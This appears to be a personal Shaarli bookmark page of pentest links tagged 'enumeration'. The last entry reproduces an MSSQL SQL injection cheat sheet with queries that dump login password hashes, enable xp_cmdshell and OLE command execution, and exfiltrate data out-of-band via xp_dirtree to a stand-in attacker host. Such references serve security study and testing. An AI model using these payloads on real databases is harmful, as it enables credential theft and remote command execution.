776 links
  • Shared Bookmarks
  • Home
  • Login
  • RSS Feed
  • ATOM Feed
  • Tag cloud
  • Picture wall
  • Daily
Links per page: 20 50 100
8 results tagged enumeration x
  • thumbnail
    Subdomain Finder
    January 15, 2021 at 2:19:44 PM UTC - permalink -
    QRCode
    - https://subdomainfinder.c99.nl/
    subdomain enumeration redteam red team reconnaissance
  • thumbnail
    bgp.he.net/jf
    January 13, 2021 at 2:21:21 PM UTC - permalink -
    QRCode
    - https://bgp.he.net/jf
    asn lookup enumeration redteam red team
  • thumbnail
    Subdomain Enumeration: 2019 Workflow
    January 7, 2021 at 3:27:19 PM UTC - permalink -
    QRCode
    - https://0xpatrik.com/subdomain-enumeration-2019/
    enumeration enum massdns sublister red team redteam
  • Subdomains Enumeration: what is, how to do it, monitoring automation using webhooks and centralizing your findings | by Eduard Toloza | Medium
    August 28, 2020 at 5:00:25 PM UTC * - permalink -
    QRCode
    - https://medium.com/@edu4rdshl/subdomains-enumeration-what-is-how-to-do-it-monitoring-automation-using-webhooks-and-5e0a0c6d9127
    enumeration findsubdomain finddomain automation cron job api
  • thumbnail
    Password Spraying & Other Fun with RPCCLIENT - Black Hills Information Security
    December 8, 2019 at 1:18:46 PM UTC - permalink -
    QRCode
    - https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
    rpcclient domain users groups ad enumeration querygroup enumdomusers enumdomgroups
  • thumbnail
    Subdomains Enumeration Cheat Sheet · Pentester Land
    November 13, 2019 at 1:09:14 PM UTC - permalink -
    QRCode
    - https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html
    subdomain subdomains enumeration hacking pentest wfuzz dns recon
  • thumbnail
    MSSQL Injection Cheat Sheet | pentestmonkey
    March 28, 2019 at 1:38:44 PM UTC - permalink -
    QRCode
    - http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
    cheatsheet mssql sql injection enumeration enum post exploitation privilege escalation hacking pentest windows
  • thumbnail
    SQL Injection Cheat Sheet: MSSQL — GracefulSecurity
    Version
    SELECT @@version;
    SELECT @@VERSION LIKE '%2008%';
    
    User details
    SELECT user;
    SELECT current_user;
    SELECT SYSTEM_USER;
    SELECT USER_NAME();
    SELECT USER_NAME(2);
    SELECT SUSER_SNAME();
    SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID;
    SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE '0' END);
    
    Database details
    SELECT DB_NAME();
    SELECT DB_NAME(5);
    SELECT name FROM master..sysdatabases;
    
    Database credentials
    SELECT name %2b ':'  %2b master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins;
    
    Server details
    SELECT @@servername; SELECT host_name(); SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel');
    
    Table Names
    SELECT name FROM master..sysobjects WHERE xtype='U';
    SELECT table_name FROM information_schema.tables;
    
    Columns Names
    SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHERE name = 'tablename';
    SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename';
    
    No Quotes
    SELECT * FROM Users WHERE username = CHAR(97) + CHAR(98) + CHAR(99);
    ASCII(SUBSTRING(SELECT TOP 1 username FROM Users,1,1)) = 97;
    ASCII(SUBSTRING(SELECT TOP 1 username FROM Users,1,1)) < 128;
    
    String Concatenation
    SELECT CONCAT('a','a','a');
    SELECT 'a' %2b 'b' %2b 'c' %2b 'd';
    
    Conditionals
    IF 1=1 SELECT 'true' ELSE SELECT 'false';
    SELECT CASE WHEN 1=1 THEN true ELSE false END;
    
    Time-delay
    WAITFOR DELAY 'time_to_pass';
    WAITFOR TIME 'time_to_execute';
    
    Enable Command Execution
    EXEC sp_configure 'show advanced options', 1;
    EXEC sp_configure reconfigure;
    EXEC sp_configure 'xp_cmdshell', 1;
    EXEC sp_configure reconfigure;
    
    Command Execution
    EXEC master.dbo.xp_cmdshell 'cmd';
    
    Enable Alternative Command Execution
    EXEC sp_configure 'show advanced options', 1;
    EXEC sp_configure reconfigure;
    EXEC sp_configure 'OLE Automation Procedures', 1;
    EXEC sp_configure reconfigure;
    
    Alternative Command Execution
    DECLARE @execmd INT;
    EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT;
    EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%system32cmd.exe /c';
    
    "RunAs"
    SELECT * FROM OPENROWSET('SQLOLEDB', '127.0.0.1';'sa';'password', 'SET FMTONLY OFF execute master..xp_cmdshell "dir"');
    EXECUTE AS USER = 'FooUser';
    
    Read Files
    BULK INSERT dbo.temp FROM 'c:\foobar.txt' WITH ( ROWTERMINATOR='n' );
    
    Out-of-Band Retrieval
    ;declare @q varchar(200);set @q='\attacker.controlledserver'+(SELECT SUBSTRING(@@version,1,9))+'.malicious.com/foo'; exec master.dbo.xp_dirtree @q; --  
    
    Substrings
    SUBSTRING(table_name,1,1) FROM information_schema.tables = 'A';
    ASCII(SUBSTRING(table_name,1,1)) FROM information_schema.tables > 96;
    
    Retrieve Nth Line
    SELECT TOP 1 table_name FROM information_schema.tables;
    SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables);
    March 28, 2019 at 1:36:53 PM UTC - permalink -
    QRCode
    - https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/
    xp_cmdshell windows cheatsheet exploitation post postexploitation mssql sql injection enumeration enum hacking pentest
Links per page: 20 50 100
Shaarli - The personal, minimalist, super fast, database-free, bookmarking service by the Shaarli community - Help/documentation